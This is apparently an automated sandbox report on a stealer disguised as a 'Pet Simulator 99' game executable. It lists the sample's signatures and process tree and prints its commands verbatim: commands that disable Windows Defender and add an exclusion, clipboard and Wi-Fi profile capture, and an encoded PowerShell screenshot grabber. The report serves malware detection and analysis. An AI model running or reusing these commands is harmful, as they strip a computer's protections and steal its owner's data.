Malware Analysis Report

2025-05-05 21:21

Sample ID 240510-s6vj7sdc4x
Target [πŸšͺBACKROOMS] Pet Simulator 99!.exe
SHA256 b984e378befd8a00559bb9f7d58015ea781615f47172a1c0ccfd4fad3cb2b9a2
Tags
pyinstaller execution spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

b984e378befd8a00559bb9f7d58015ea781615f47172a1c0ccfd4fad3cb2b9a2

Threat Level: Likely malicious

The file [πŸšͺBACKROOMS] Pet Simulator 99!.exe was found to be: Likely malicious.

Malicious Activity Summary

pyinstaller execution spyware stealer

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Loads dropped DLL

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Detects Pyinstaller

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Gathers system information

Enumerates processes with tasklist

Detects videocard installed

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-10 15:44

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-10 15:44

Reported

2024-05-10 15:46

Platform

win11-20240426-en

Max time kernel

18s

Max time network

22s

Command Line

"C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4312 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe
PID 4312 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe
PID 4196 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 3168 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3632 wrote to memory of 3168 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 3956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 3956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4196 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 872 wrote to memory of 3564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4604 wrote to memory of 4524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4604 wrote to memory of 4524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 872 wrote to memory of 3564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4196 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 456 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 456 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4584 wrote to memory of 4988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 4988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 864 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 864 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 648 wrote to memory of 4636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 648 wrote to memory of 4636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2432 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2432 wrote to memory of 4616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 412 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 456 wrote to memory of 3720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 456 wrote to memory of 3720 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3724 wrote to memory of 3500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3724 wrote to memory of 3500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4196 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 3436 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3436 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4196 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 2424 wrote to memory of 2156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2424 wrote to memory of 2156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4196 wrote to memory of 4288 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4288 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4580 wrote to memory of 2680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4580 wrote to memory of 2680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4288 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4288 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4196 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 1864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1548 wrote to memory of 1864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com

Processes

C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe

"C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe"

C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe

"C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

